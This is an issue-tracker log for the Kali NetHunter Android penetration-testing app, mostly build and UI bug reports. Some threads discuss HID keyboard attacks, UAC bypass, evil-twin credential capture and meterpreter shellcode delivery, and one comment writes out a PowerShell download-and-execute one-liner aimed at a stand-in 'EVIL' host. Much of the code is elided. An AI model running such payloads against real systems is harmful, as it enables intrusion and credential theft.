[2014-11-16 20:27] jmingov opened #10 "Android Linter complains too much. [DONE]"
Some refractor etc .

[2014-11-17 17:27] #10 closed, assigned to nobody

[2014-11-17 22:38] pawco opened #11 "I can not run the app"
Hi Jaime,

I spent two hours to make this app work but no success.
Here is the screenshot from my Eclipse:
![screen shot 2014-11-17 at 11 28 34 pm](https://cloud.githubusercontent.com/assets/9696673/5079144/27664efe-6eb2-11e4-9c28-5db194959482.png)
As you can see, all errors are:
    - R cannot be resolved to a variable
and R.java file is not generated.
Usually that means there is a problem with x

[2014-11-18 09:27] #11 closed, assigned to nobody

[2014-11-18 09:52] pawco opened #12 "Side menu not available on all screens"
Side menu is not available from all screens, just from first three (NetHunter Home, Kali Launcher and Kali services control).
I'll rewrite all activites as fragments to make possible to open side menu on any screen.

[2014-11-25 14:15] #12 closed, assigned to pawco

[2014-11-28 20:29] binkybear opened #13 "EACCES Permission Denied"
Receive EACCES Permission Denied when attempting to update all configuration files through application (/sdcard/files).

I see read/write access in the manifest:

https://github.com/offensive-security/nethunter-app/blob/3e8583944397e1de2d12fbd82a85df32105ffcdf/AndroidManifest.xml#L10

So I'm not sure if it has something to do with install process.

[2014-11-30 19:50] #13 closed, assigned to nobody

[2014-12-06 01:20] jmingov opened #14 "Fixing compat with the term apk [DONE]"
Rewriting comands passed to the terminal apk in `su -c cmd1; cmd2` format for compatibility.
https://github.com/offensive-security/kali-nethunter/issues/121
@Gh0u1L5

[2014-12-09 00:34] #14 closed, assigned to nobody

[2014-12-30 05:10] palmerit opened #17 "Launch Wifite not working from app"
When I open the app, and click "Kali Launcher > Launch Wifite" I'm getting an error in wifite that says "airmon-ng requires the program iw"  and then it quits and dumps me to a shell.  This is on a OnePlus One, running stock firmware (4.4.4) and with Kali-Nethunter taken from the tip of the development branch using the androidmenu.sh script to build a rootFS and kernel for bacon.

[Kali-NetHunter

[2014-12-30 05:20] palmerit opened #18 "Occasional odd behavior from app"
I haven't narrowed this down yet,  but I'm opening the issue anyway. Hoping you guys can give me a hint or have me test something to help narrow this down.

"occasionally" when I reboot my phone with the external antenna plugged into an OTG cable, the nethunter app will appear as it does in the below screenshot.  *when* this issue manifests, it seems like every subsequent launch of the app will be

[2015-01-01 16:50] jmingov opened #19 "Adding Macchanger & Monitor mode to the app [ONGOING]"
Just a couple of handy features.

[2015-01-01 23:33] Zaxscdvf commented on #19
hmm.. would be convenient but pretty easy to do it yourself.

[2015-01-01 23:44] binkybear commented on #19
I think it would be a great addition to app.

[2015-01-04 20:30] cquick97 opened #20 "Indicator if functions are running?"
Hello,

I just noticed that if I have MANA running, and remove the Wi-Fi adapter for any reason, the tablet crashes. However, if I turn it off first, it doesn't. I think it would be nice to have some sort of indication, sort of like the kali services page, telling when some of these attacks are active. Same thing with the BadUSB attack too.

Also, for all the attacks, I think it would be nice to m

[2015-01-04 21:01] Zaxscdvf commented on #20
I think that's a good idea!

[2015-01-08 19:33] unknownpwn opened #21 "App crashes seemingly randomly when starting it"
Sometimes when the app is started, it crashes. Seems to happen if you've started the app, then go about with your business in other apps and then click the shortcut again. But I'm not 100% sure on if that is the case or if it is "random". Here's the output from CatLog.

![img_20150108_173736](https://cloud.githubusercontent.com/assets/9800002/5669131/77fbe9a0-9775-11e4-820c-962238f3137a.jpg)
![001

[2015-01-14 08:46] unknownpwn opened #22 "Persistance in settings under HID attack"
If I choose, from the menu, UAC Bypass Windows 7 and Language Spanish, click update, then switch tabs to another (say for example Nethunter Home) and then back again, the settings I chose from the menu are reset back to normal (No UAC bypass and English).

Is it possible to retain these settings while switching tabs?

[2015-01-14 14:16] jmingov commented on #22
Yes, it is posible, storing the instance state and restoring it again(from saved instance), but for a 'permanent chage' we should store an read the options from the SharedPreferences for example.

Im really bussy these week. I can take a look in a few days if isnt solved.

@pawco

[2015-01-14 14:18] pawco commented on #22
I'm already working on that. As soon as I finish I'll post update here.

[2015-01-14 15:00] unknownpwn commented on #22
Awesome, thanks @pawco @jmingov

[2015-01-14 17:22] pawco commented on #22
This is fixed. App will retain UAC Bypass and Keyboard layout settings not only when switching tabs, but also if phone is restarted.

[2015-01-14 17:22] #22 closed

[2015-01-14 20:02] unknownpwn commented on #22
Fantastic, thank you @pawco

[2015-01-15 21:27] discipuloosho opened #24 "Please, Safety first"
I know that is error set policy selinux permissive from startup. (Sorry my poor English) So, I think it is more convenient, activate it when necessary, that is, when we start the nethunter app. Here is my contribution:

// Set SELinux to permissive
private static final String COMMAND = "su 0 setenforce 0";
try {
  Runtime.getRuntime().exec(COMMAND);
} catch (IOException e) {
  e.printStackTrace();

[2015-01-15 23:44] jmingov commented on #24
Hi, as far i know right now, the set enforce changes are handled by the nethunter script (bootkali) and not by the app. (https://github.com/offensive-security/kali-nethunter/blob/master/flash/system/bin/bootkali#L2)

We launch the processes from the app in the format su -c bootkali [commands].

If we remove the setenforce from the bootkali script, we can have troubles launching programs straight f

[2015-01-16 11:38] binkybear commented on #24
I think it makes more sense to have it in bootkali for now.  Having it in the app means it will automatically set to permissive before we even use the chroot.  Although, I don't think either change is necessarily "bad."  I'm just not sure adding it to the app is needed at the moment.  Let me know if you feel otherwise @discipuloosho.

[2015-01-18 01:43] discipuloosho commented on #24
For example, hid keyboard attack doesn't work if selinux is enforcement, but hid attack doesn't need execute boootkali file. I think that nethunter app is the control center nethunter, so the app must open and close necesary global permissions. But is my suggestion.

[2015-01-18 06:14] binkybear commented on #24
@discipuloosho - It actually launches through bootkali now:

https://github.com/offensive-security/kali-nethunter/blob/master/flash/system/bin/bootkali#L182

We have merged the latest changes from development back to master on the nethunter repo also since there was a recent release.

[2015-01-25 04:58] thesle3p opened #26 "source for nethunter-app does not build."
Hi I am a android newb so I don't know if the nethunter app is bugged or if I just failed at compiling it but when I try and build the nethunter-app from source I get this error message:
aapt package -M ./AndroidManifest.xml
./AndroidManifest.xml:2: error: No resource identifier found for attribute 'versionCode' in package 'android'

./AndroidManifest.xml:2: error: No resource identifier found for

[2015-01-25 10:46] jmingov commented on #26
Hey @thesle3p lets debug this.

Which IDE are you using? (Eclipse o Andrpid Studio?)

Something looks miss configured in the IDE, since @pawco made a build a few hours ago with your pull request.

[2015-01-25 17:46] thesle3p commented on #26
I am using Android studio and now I can get the app to compile and
install via ADB but when I run it (on a nexus 7 2013 wifi-only) the app
crashes and I get the error "Unfortunately,NetHunter Android has
stopped"
On Sun, 2015-01-25 at 02:46 -0800, 3boll wrote:

[2015-01-25 17:57] pawco commented on #26
Is there any log?

[2015-01-26 03:54] thesle3p commented on #26
From Android? There isn't a stack trace on the error message if that's
what you mean. However when I make/build the nethunter app I get these
warnings from Android-studio:
Information:Using javac 1.7.0_75 to compile java sources
Information:Android Resource Caching: Caching resources [nethunter-app]
Information:Android Resource Caching: [nethunter-app] Crunching PNG
Files in source dir: nethunter-

[2015-01-26 08:25] pawco commented on #26
I'm not using Android studio, so maybe I'm wrong but when I google for your problem looks like a problem in libpng.

```These are just warnings because the newer libpng we built against is stricter about the color profile. We will fix this in an upcoming release, but this shouldn't be an issue.```
But, even with that warnings, you should be able to build the app.

What build tools version you are

[2015-01-26 08:41] thesle3p commented on #26
I now can get the nethunter-app to build but whenever  I open it I get a
error message and when I check logcat I get this:
E/AndroidRuntime(26641): Caused by: java.lang.ClassNotFoundException:
Didn't find class "com.offsec.nethunter.AppNavHomeActivity" on path:
DexPathList[[zip file
"/data/app/com.offsec.nethunter-1.apk"],nativeLibraryDirectories=[/data/app-lib/com.offsec.nethunter-1, /vendor/lib,

[2015-02-16 06:59] fat-tire opened #29 "Needs a LICENSE"
Talked w/binkybear- wasn't sure what the license was...  I vote for GPLv3 but anyhoo...

[2015-02-16 12:59] jmingov commented on #29
Here is  the Kali Linux Open Source Policy (standar distribution only?)

http://docs.kali.org/kali-policy/kali-linux-open-source-policy

Althought @offensive-security probably will point the right license to use.

[2015-02-16 23:11] Zaxscdvf commented on #29
http://stopnerds.org/license/ vote this

[2015-02-19 00:10] fat-tire commented on #26
I just posted a [pull request](https://github.com/offensive-security/nethunter-app/pull/30) that includes a build.gradle file that may help if you're building in Android Studio.  Hope it helps.

[2015-03-22 22:53] binkybear commented on #18
Solved.

[2015-03-22 22:53] #18 closed

[2015-03-22 22:54] #24 closed

[2015-03-22 22:56] binkybear commented on #26
Builds fine, closing issue.

[2015-03-22 22:56] #26 closed

[2015-03-22 22:57] binkybear commented on #29
License added.

[2015-03-22 22:57] #29 closed

[2015-05-17 13:02] royalhacker opened #39 "Didnt get iptables in sidemenu"
hello @binkybear
i hv been having a strange issue.
i compiled the app on my pc and even then i didnt see the new iptables side menu item.
i digged a little and got a array that seemed suspicious in sideview.java

  public String[][] querySampleActivities() {
        Intent intent = new Intent(Intent.ACTION_MAIN, null);
        intent.setPackage(getActivity().getPackageName());
        intent.addCa

[2015-05-17 14:49] jmingov commented on #39
Hey there, this lines

    if (Build.VERSION.SDK_INT >= 21) {
        total = count-1;
    }

Is why you dont see the option of the iptables, isnt a bug, is because the iptables isnt avalable in sdk >= 21

Jaime

[2015-05-17 16:37] royalhacker commented on #39
is it due to pie

and then how does evil mana works

[2015-05-24 13:10] offensive-security commented on #39
Using ip policy routing...

[2015-05-24 13:10] #39 closed

[2015-06-09 13:56] thesle3p opened #41 "[feature request] MSFRPC/msgpack client for talking to armitage teamservers/MSFRPC"
I find that the area that Nethunter is lacking the most in is controlling a box after access has been gained. A easy way to solve this would be to implement a MSFRPC/msgpack client into the Nethunter app to communicate with Armitage teamservers to do things like setup listeners, run post modules and run exploit modules etc. This would be less resource intensive and easier to use on android then Ru

[2015-06-09 16:40] offensive-security commented on #41
Not something we have planned to do, but community patches are welcome!

[2015-06-09 16:40] #41 closed

[2015-06-09 16:40] binkybear commented on #41
@thesle3p - One project that did something similar to what you are thinking is dSploit/cSploit.  The code can be found here:

https://github.com/cSploit/android/blob/master/cSploit/src/org/csploit/android/tools/MsfRpcd.java
https://github.com/cSploit/android/blob/master/cSploit/src/org/csploit/android/tools/Msf.java

As @offensive-security, it's not something that's planned at the moment but we co

[2015-06-15 11:39] thnks1 opened #42 "Scrolling in Mana Evil Access Point Configurations"
Right now it is only possible to scroll the configuration files within the app using the arrow keys on the keyboard. It would be awesome to allow scrolling with your fingers, to get to the areas you need to edit quicker.

[2015-10-10 00:46] ecofriendly opened #46 "Check for architecture fails on some 64 bit arm devices (such as samsung s5)"
On the "fattire-rebased" branch, the variable "dir" is set to null instead of "arm" because of an incomplete check of arm64 devices.  As you can see [here](https://github.com/offensive-security/nethunter-app/blob/fattire-rebased/src/com/offsec/nethunter/ChrootManagerFragment.java#L145-L146), the architecture is expected to say "arm", which is true in most "arm64" devices.  However, some devices su

[2015-10-10 00:50] fat-tire commented on #46
Oh shucks, you shouldn't have.

I guess arm64 was apple's version and aarch64 was everyone else in llvm, and they [merged](https://www.phoronix.com/scan.php?page=news_item&px=MTY5ODk) at some point.

Anyway, I think assuming it works now for ecofriendly that this is a good fix.

[2015-10-10 00:58] binkybear commented on #46
Thanks @ecofriendly, I believe this should fix issue.

[2015-10-10 00:58] #46 closed

[2015-10-16 07:30] mame82 opened #47 "Errors in HIDFragment and DuckHunterFragment"
I've managed to compile a custom kernel for Samsung GT-I9300 which runs with CM-12.1 and nethunter (kali2  branch) rootfs. HID wasn't working, but running the scripts by hand does ("bootkali hid-cmd --de" for example).
The Problem could be brought down to missing exclamation marks. Changing

command[0] = "su -c bootkali hid-cmd --" + lang;

to

command[0] = "su -c \"bootkali hid-cmd --" + lang + "

[2015-10-16 14:57] binkybear commented on #47
Hi @mame82,

Thank you for the detailed report and suggested fixes.  It shouldn't be an issue fixing the hidfrag/duckfrag.  I'm pushing a patch right now if you want to try.

Duckhunter.py is grabbed during the build process:
https://github.com/offensive-security/kali-nethunter/blob/master/androidmenu.sh#L875

I would highly suggest you use Android Studio instead of Eclipse.  Android has pretty mu

[2015-10-16 23:57] mame82 commented on #47
Hi @binkybear,
thank you for your fast reply. I'll try the patch next week and I think I'll take a closer look at Android Studio.

Considering duckhunter, something must have gone wrong during my rootfs build, cause some other files were  missing, too (maybe some wget's didn't run).

Yes, I refered to the web-app - surely it was difficult to maintain this - there must habe been mich editing of /et

[2015-10-21 08:28] mame82 commented on #47
Hi @binkybear

The patches made are exactly the same I did before compiling and they work, thus I didn't synced the repo again to recompile (I'm running out of time finishing my project). Could you be so Kind and include the recompiled apk in "kali-nethunter". I opened another issue in kali-nethunter (#255) which needs to be fixed for keyseed.py in order to make duckhunter work (at least on dict_d

[2015-10-21 11:22] binkybear commented on #47
@mame82 - Just uploaded the new apk.  I'm going to close this issue since changes were made and new apk just got uploaded.

Thanks for letting me know about problems, I do appreciate you finding these errors.  I will look into the dict_de issue  also.

[2015-10-21 11:22] #47 closed

[2015-11-04 20:09] jmingov commented on #42
This is solved.

[2015-11-04 20:15] #42 closed

[2015-11-05 02:44] #17 closed

[2015-12-17 19:12] jmingov commented on #21
Long time i dont see a fc ^^ . This can be closed @binkybear

[2015-12-17 21:12] jmingov opened #92 "Include win10 UAC in keyseed"
https://github.com/offensive-security/nethunter-app/blob/master-2.1/assets/nh_files/modules/keyseed.py

Thanks  @sizzop for thouse keystrokes!

`win - "cmd" - right click (context menu) - down arrow - enter - left arrow - enter`

@binkybear ^^

[2015-12-17 23:45] #21 closed

[2015-12-18 02:26] #92 closed

[2015-12-18 02:27] binkybear commented on #92
Maybe fixed in:

https://github.com/offensive-security/nethunter-app/commit/c591439c3e3fe7292e54839142521b12b7cc479c

[2015-12-29 21:34] TheNain38 commented on #19
+1

[2015-12-29 21:37] jmingov commented on #19
This is in the latest app already.

[2015-12-29 21:37] #19 closed

[2015-12-29 22:18] Gualty opened #98 ""Error launching intent. Install Android Terminal!""
Hi,
today I installed all on my Nexus 5 (App, Chroot, etc...).

When I try to open something that need to be executed in a terminal a message appears: "Error launching intent. Install Android Terminal!"
I installed the "Android Terminal" app of Jack Malevich, the same app that was installed in previous version of Nethunter but the problem persists.

Anyone had the same issue?

Regards

[2015-12-29 22:40] jmingov commented on #98
Not sure how you installed nethunter, we are using a cutom terminal now.

Is should be installed with the rest of the apps.

You can download it here: https://github.com/offensive-security/kali-nethunter/blob/master/AnyKernel2/data/app/Term-nh.apk

But looks like your install is not complete/ not well installed.

You created a installer with anykernel?

[2015-12-29 23:00] Gualty commented on #98
I downloaded the app from GitHub and the compiled with Android Studio. But maybe it was not the right procedure...
I'm trying to install it

[2015-12-29 23:25] jmingov commented on #98
Remove the chroot, remove the app, build the installer from:

https://github.com/offensive-security/kali-nethunter/tree/newinstaller-fj/AnyKernel2

Root the phone, install TWRP and flash the zip youll get from the installer.

If you can not build it yourself, use the stable release from:

https://www.offensive-security.com/kali-linux-nethunter-download/

More info here:

https://github.com/offensi

[2015-12-29 23:25] #98 closed

[2015-12-31 18:41] jmingov commented on #20
Not sure how to make this without eating the battery ^^

Suggestions accepted.

[2016-01-02 23:11] TheNain38 opened #106 "Enhancements for DuckHunter interface"
- [x] if you change language while being on the preview tab, it should update the preview
- [x] if it was already converted, and then you launch an attack, then it shouldn't reconvert it
- [x] if you didn't changed anything in the convert tab, then it shouldn't reconvert it if you go to preview tab

[2016-01-02 23:16] TheNain38 opened #107 "Add missing commands in DuckHunter"
- [x] REPEAT
- [x] DEFAULT_DELAY
- [x] WIN10CMD ?
- [x] Other commands ?

[2016-01-04 00:44] #107 closed

[2016-01-04 00:49] jmingov commented on #107
Well done. :dango:

[2016-01-04 00:51] binkybear commented on #107
Yes, great job!

[2016-01-04 00:55] TheNain38 commented on #107
Thanks, this issue was just here as a reminder, now, duckhunter have another look with all these enhancements ;) Now, I just need to finish the tasks in #106, if you could help me with that ^^ I will thank you... School is here, and I won't be able to do that much code ^^

[2016-01-04 01:06] TheNain38 commented on #107
Also, maybe you should update the wiki, the last link in the home page of kali-nethunter repo gives a 404 error and also in bullet 7.0 it is written 'Andropid'. Also, the nethunter-app wiki should include something about DuckHunter

[2016-01-04 01:08] binkybear commented on #107
The wiki's will be updated this week as there will probably be a release *very soon*.  The nethunter-app wiki will probably be removed and we will focus our efforts in kali-nethunter.

In the meantime we will be not adding any big features this week but mainly looking to clean up any bugs.

[2016-01-04 01:09] TheNain38 commented on #106
All 3 shouldn't be hard to add, if you add a boolean that tells the app if it needs to reconvert the code.

[2016-01-04 01:18] TheNain38 commented on #107
Ah, ok, this is good news to have a new release. My enhancements for DuckHunter corrected bugs too. (And added features). The issues in the GUI just really bother me, I don't find the fact you have to wait 2 secondes before it launches the attack to be really convenient. I will try to correct these before 3.0 arrives!!

[2016-01-04 02:42] jmingov commented on #106
Tho you said you also program in java...

Done.

[2016-01-04 02:42] #106 closed

[2016-01-04 06:08] TheNain38 commented on #106
Thank you so much @jmingov! Yes, I also program in Java, I've already done a a big project: a game (it isn't on the net, just on my computer). But I said I won't have the time this week because of school and stuff. Again, thank you!

[2016-01-04 06:13] TheNain38 commented on #106
Also, I think the convert button should be renamed to 'Attack'

[2016-01-05 07:17] dukenukem2d opened #112 "BadUsb Issue"
Hi,

I just installed NetHunter on my Nexus 5 - 5.1.1. and try to use BadUsb MITM Attack. But nothing happen. badusb.log is showing follow message
"tmp-mksh:<stdin>[1]:start-badusb-lollipop: not found
I tried to run this command
su
/sdcard/files/startbadusb-lollipop.sh

I got this one

tmp-mksh: /sdcard/files/startbadusb-lollipop.sh: can't execute: Permission denied

What's mean? How to fix?

Than

[2016-01-05 09:30] jmingov commented on #112
Hi
How did you installed nethunter?

Which instructions you followed?

I a stock rom the one you used as base?

[2016-01-05 09:34] dukenukem2d commented on #112
Hi,

Stock ROM 5.1.1. rooted, twrp, busybox, Nethunter ROM.

[2016-01-05 09:37] jmingov commented on #112
You used a zip from https://www.offensive-security.com/kali-linux-nethunter-download/?

[2016-01-05 09:57] dukenukem2d commented on #112
yes.

[2016-01-05 10:18] jmingov commented on #112
Well, is an old version, no fixes will be applied there. The images will be updated soon.

The fix is installing the latest nethunter from the main repo, you need to build it:

https://github.com/offensive-security/kali-nethunter/wiki/Building-Nethunter

[2016-01-05 10:18] #112 closed

[2016-01-05 10:45] dukenukem2d commented on #112
Noted.

Thanks a lot.

[2016-01-10 06:08] mubix opened #114 "Invoke-Shellcode"
Thanks for the fixes in #113 - huge thanks to @jmingov in particular. Unfortunately "-Payload windows/meterpreter/reverse_https -Lhost 192.168.1.19 -Lport 4457" are no longer parameters of [Invoke-Shellcode](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1). It only takes a `-Shellcode`, `-ProcessId`, and `-Force`. I attempted to use an older version of

[2016-01-10 12:15] jmingov commented on #114
Hello dears, @mubix  @binkybear

Imo, 1,2 and 3 are easy to do (We have them already in the code) we need to remove, not to add for this ^^

Also the 'Other option (the generic one)' could be a great addition, so the user can have both in the app.

Jaime

[2016-01-18 22:28] binkybear commented on #114
@mubix - After looking at Invoke-shellcode it still looks like we can pass -Shellcode.  So we can generate the shellcode with msfvenom from code:
[code]
Then run powerball.py to make it into correct output shellcode.  Finally, here is the output to /var/www/html/payload-url (TODO: we should probably change location)
[code]
TODO: We should add a progress bar dialogue to the update to show users wha

[2016-01-21 01:03] binkybear commented on #114
Updated with progress dialogue.  Updated APK for testing:

https://transfer.sh/YInuc/nethunter-app-release.apk

[2016-01-21 18:17] iii00 opened #115 "Kali Services Menu"
If you start all Kali Services and reenter Services menu at once - only SSH, apache, dnsmasq and beef will keep on running (beef will be shown as disabled, but it works).

Looking at nethunter apk, for example, we can see, that Metasploit starts using
         $busybox chroot $mnt service postgresql start
   		$busybox chroot $mnt service metasploit stop

but "service metasploit start" will return

[2016-01-21 22:45] jmingov commented on #115
Ill take a look at this soon.

[2016-01-22 03:30] sirulian commented on #114
I wanted to add my two cents here...
Using the shellcode that the HID attack generated in the "payload-url", the powershell script would stop. I was running an x86 shellcode on a 64 bit powershell instance. You could add this line to the script to prevent this when running the HID attack (still haven't gotten it to work yet...):

%SystemRoot%\syswow64\WindowsPowerShell\v1.0\powershell.exe -exec by

[2016-01-22 23:58] thesle3p opened #118 "android app's default stored command looks for /usr/bin/dumpmifare instead of /usr/bin/dumpmifare.sh"
Currently the nethunter-utils package installs the dumpmifare script to /usr/bin/dumpmifare.sh but the nethunter app in it's stored command app looks for this script under the name /usr/bin/dumpmifare (sans extension) a work around is to make a symlink between the two but either the nethunter-utils package or the default stored command in the android app should be synced with the appropriate file

[2016-01-23 00:49] jmingov commented on #118
Duplicate and solved.

https://github.com/offensive-security/kali-nethunter/issues/347

[2016-01-23 00:49] #118 closed

[2016-01-28 11:33] kepzbro opened #119 "Can't read sdcard/nh_files/configs/hostapd-karma.conf: No such file or directory."
Hello! I can't get mana toolkit or bad usb to work because of nethunter can't seem to find the directory or files in terminal. I have no problem looking into the folder with ÉS file explorer and all files seem to be there. Someone know how to fix this?

[2016-01-28 15:49] binkybear commented on #119
Can you please provide more details such as what device/version of OS/version of software you are using.  Do you see files inside chroot in /sdcard?

[2016-01-28 23:10] thesle3p commented on #114
I am concerned with something about  this change: I Often  use the USB HID attack in nethunter to execute powershell scripts other then invoke shellcode, would that still work, for example if I were to set the URL to "http://evilhost.com/empire-agent.ps1 it wouldn't run would it? I see the nethunter app looks to specifically execute the invoke shellcode cmdlet. Any chance a option could be added f

[2016-01-28 23:32] thesle3p opened #121 "update button does not save settings for HID powersploit attack"
so the most recent update to the nethunter app for what ever reason does not save the configuration for powersploit or does not load it at run time because upon exiting and restarting the app the fields are not repopulated.

[2016-01-28 23:58] binkybear commented on #114
I believe we plan on integrating more with empire in the future.  If you want a "generic" http to powershell I think that should be separate from this attack and probably should have its own tab or be made separate.

This attack was always specific for invoke shellcode script.

[2016-01-29 00:01] binkybear commented on #121
I'm debating if this is really a bug or not because we previously would save the configuration into the powershell exploit itself.  However, because we have to pass the shellcode now separate  we don't save those settings in the ps1 file.  Before regex would be used in the exploit to get those settings but we don't do that anymore.

I think it might be more of an enhancement at this point but I wi

[2016-01-29 00:10] thesle3p commented on #114
A more generic http to powershell tab would be really useful because I
often have a need to download and execute pure powershell payloads.

On 01/28/2016 06:58 PM, binkybear wrote:

[2016-01-29 00:12] thesle3p commented on #121
Why not have the shell code saved to a file when generated then read and
piped out to invoke shellcode? I bring this up because on a red team
engagement you don't always have time to sit around and wait for
shellcode to be generated, especially if you are compromising multiple
systems in a row.

On 01/28/2016 07:01 PM, binkybear wrote:

[2016-01-29 01:55] simonpunk commented on #114
but I think these changes are taking more time to get the payload execute on target. Like first, we have to wait more than 30 seconds for the msfvenom to generate the shellcode, and when we execute the attack, it again takes around 20 seconds to output the very very very long encoded strings, and sometimes it happens to report error with powershell likely because of the long encoded string. So I p

[2016-01-29 02:26] binkybear commented on #114
@simonpunk - Well we can easily drop the shellcode generation or maybe generate it after the attack is launched.  I could also enable --smallest in msfvenom although I'm not sure how much of a difference it would make.

Another possible avenue, and probably the best, would be add the shellcode directly to ps1 file here: https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invok

[2016-01-29 02:28] binkybear commented on #121
Ha! Just noticed we had the same type of idea. Going to mark this duplicate for now since we are already discussing it in https://github.com/offensive-security/nethunter-app/issues/114#issuecomment-176519338

[2016-01-29 02:28] #121 closed

[2016-01-29 03:32] thesle3p commented on #114
To be honest it would be simple and easy to just add a option to
download and execute a powershell script using IEX (New-Object
Net.Webclient).downloadstring("http://EVIL/evil.ps1")

On 01/28/2016 09:26 PM, binkybear wrote:

[2016-01-29 09:55] kepzbro commented on #119
Ok so this is what I have done so far: I upgraded my device version from lollipop 5.1.1 to marshmallow 6.0. then I reinstalled Nethunter 3.0 with the marshmallow rom instead. The install was successfull without any errors of what I could see. I started the phone went in terminal to get neccessary drivers for my Tp-link WN722N. Then I tried to get "ifconfig wlan1 up" now I get Error while getting i

[2016-02-06 17:41] simonpunk opened #122 "Is captive portal supported in Mana toolkit???"
@binkybear @jmingov
I wonder if we can set up a real captive portal website when launching the mana toolkit.
So far as I know, we can do it using no start-noupstream.sh script, but it doesn't give network access to every clients, it just simply like spoofing the dns forces clients always redirect to our fake portal website.

So, what I want is every clients who have connected to my wifi ap will be

[2016-02-07 03:57] binkybear commented on #122
@simonpunk - Its def possible to do it (set up an evil twin/captive portal) to catch login and passwords.  However, it's not something mana does out of the box so someone would have to write something to do this.  There are some examples/programs that could help with this.

Something similar to this script: https://github.com/Byzantium/Byzantium/blob/master/captive_portal/captive-portal.sh where i

[2016-02-28 20:28] ShaharLahav opened #123 "HID help explain"
Hi, I am very sorry for the silly question:
Can you explain me how the HID works? i mean, what should I do in order to use the meterpreter in my kali linux to control the victim's computer ?
I've tried to just execute the powersploit attack with the configured port and host, but nothing happens, I mean the cmd shows a lot of 'unrecognized' as in wrong commands...
I haven't put anything in the URL

[2016-02-28 21:40] ShaharLahav commented on #123
Actually this is what I get :

[code]

[2016-02-29 05:44] simonpunk commented on #123
Please update to the latest version. This happened to me long time ago when I used the old version.
So I can just tell you that this is caused by executing the wrong script in nethunter.

[2016-02-29 17:08] ShaharLahav commented on #123
I have the 3.0.5 version

[2016-03-02 19:55] 0o0TheDude0o0 opened #124 "error launching intent install android terminal"
I get this error when trying to launch vnc server or any other actions that require terminal. I am using terminal emulator for Android from the play store... Any thoughts?

[2016-03-03 01:53] binkybear commented on #124
You should be using terminal emulator associated with nethunter app which supports those custom intents.  They apps can be downloaded here:

https://github.com/offensive-security/kali-nethunter/tree/master/nethunter-installer/update/data/app.  Just get the raw file and install with adb or manually.

[2016-03-03 01:53] #124 closed

[2016-03-07 13:07] zuthroxius commented on #123
same problem here, on oneplus1

[2016-03-09 16:19] zuthroxius commented on #123
If you run apt-get upgrade && apt-get update on a kali terminal it will update the nethunter utils and fix the isssue

[2016-03-31 06:57] harayz opened #126 "nethunter > wifite"
i am running nethunter on nexus 7 2012 3G (nakasig/tilapia) with custom rom (CM12.1) and kernel.
wifite could not find the wlan1 connected via usb. when i run the terminal via nethunter app, lsusb list the device as follows:
`148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter`

however ifconfig and iwconfig does not show the connected device. ive tried several several different devi

[2016-04-05 00:30] vay3t opened #127 "suggestion: how to import apk"
As advice i would suggest to do a guide for newbies on how to import the .apk to the android studio app. for further development

[2016-04-06 14:13] thesle3p opened #128 "[suggestion] hostapd-wpe front end"
So often times on a pen test Mana is less useful as a targeted evil twin attack (we only care about impersonating one network) and we often only need to capture WPA-enterprise credentials, usually that means using hostapd-wpe. Would it be possible to add hostapd-wpe to the Nethunter repository and add to the nethunter app a front end to hostapd-wpe (GUI based config and tail of hostapd-wpe's crede

[2016-04-06 22:31] binkybear commented on #128
I looked into this and it seems pretty doable.  Here is the install script I used for testing:
[code]
The configuration file I moved to Nethunter application configuration files and pointed it to the certificates and user file to where we copied it.

Adding the above to the chroot build would be easy (just copy and paste).  The Nethunter app changes shouldn't be terribly difficult either since it

[2016-04-06 23:13] thesle3p commented on #128
Nice, any idea how soon this could be implemented?
On Apr 6, 2016 6:31 PM, "binkybear" <notifications@github.com> wrote:

[2016-04-07 02:22] binkybear commented on #128
OK - so maybe you can help with testing.  Install hostapd-wpe using instructions above.  Then install apk:

https://transfer.sh/pDNCa/nethunter-app-release.apk

Under mana-toolkit you can modify hostapd-wpe in the second tab and generate certificates.  When you are ready, hit "start mana" and select hostapd-wpe.  Let me know what needs to be fixed/added.

[2016-04-07 12:51] thesle3p commented on #128
Will check that out in a bit, just signed on to work.

-----Original Message-----
From: binkybear [mailto:notifications@github.com]
Sent: Wednesday, April 6, 2016 10:22 PM
To: offensive-security/nethunter-app
Cc: thesle3p
Subject: Re: [offensive-security/nethunter-app] [suggestion] hostapd-wpe front end (#128)

OK - so maybe you can help with testing. Install hostapd-wpe using instructions above.

[2016-04-07 20:33] thesle3p commented on #128
Ok, so two things first  to compile hostapd-wpe needs two dependencies  that you missed

```sudo apt-get install libnl-3-dev```
and
```sudo apt-get install libnl-genl-3-dev```

Also when I try and connect to the honey-net hostapd-wpe seems to want a EAP type different then what ever eap type I specify in the config, a example below:

[code]

I never saw this error on x86 Kali or stock debian, not

[2016-04-07 23:03] binkybear commented on #128
Thanks for testing.  You can get better debugging results with a -dd.  So the command to run would be:
[code]
Or if you just want a new apk with -dd built it:
https://transfer.sh/VxxYP/nethunter-app-release.apk

[2016-04-12 14:54] binkybear commented on #128
I think everything is working now:

https://transfer.sh/YJHkL/nethunter-app-release.apk

I've also used the patch for 2.5 hostapd instead.  I've submitted a pull request with the updated binary and cert files: https://github.com/offensive-security/nethunter-utils/pull/15

Eventually you should only need to run an apt-get update/upgrade and install latest apk.  I took a screenshot to confirm it wor

[2016-04-12 14:56] binkybear commented on #126
The kernel you are running may now support the rt* adapter or its possible you are missing firmware.  Maybe try this kernel instead:

https://idlekernel.com/nethunter/nightly/3.0.5-20160410-1617/kernel-only/kernel-nethunter-flocm-lollipop-3.0.5-20160410-1617.zip

[2016-04-12 14:57] #127 closed

[2016-04-12 14:58] #126 closed

[2016-04-14 18:41] thesle3p commented on #128
That  version bricks the HID attack menu in the app and makes
nethunter/android no longer see wlan1.

On 04/06/2016 10:22 PM, binkybear wrote:

[2016-04-15 01:03] binkybear commented on #128
Are you sure the kernel didn't get updated?  There were no changes to hid and theres no possible way the app removed ability to detect wlan1. (Feel free to check git history)

[2016-04-15 01:04] thesle3p commented on #128
When i go to the HID attack menu the app crashes. I was able to fix the
wlan1 detection issue with a reboot.
On Apr 14, 2016 9:03 PM, "binkybear" <notifications@github.com> wrote:

[2016-04-15 01:05] binkybear commented on #128
Ah I see now on the hid app crash.  Will look for problem/fix and upload.  Thanks for the good eye!

[2016-04-15 01:07] thesle3p commented on #128
Now that I fixed the wlan1 detection issue I will try the host apd issue
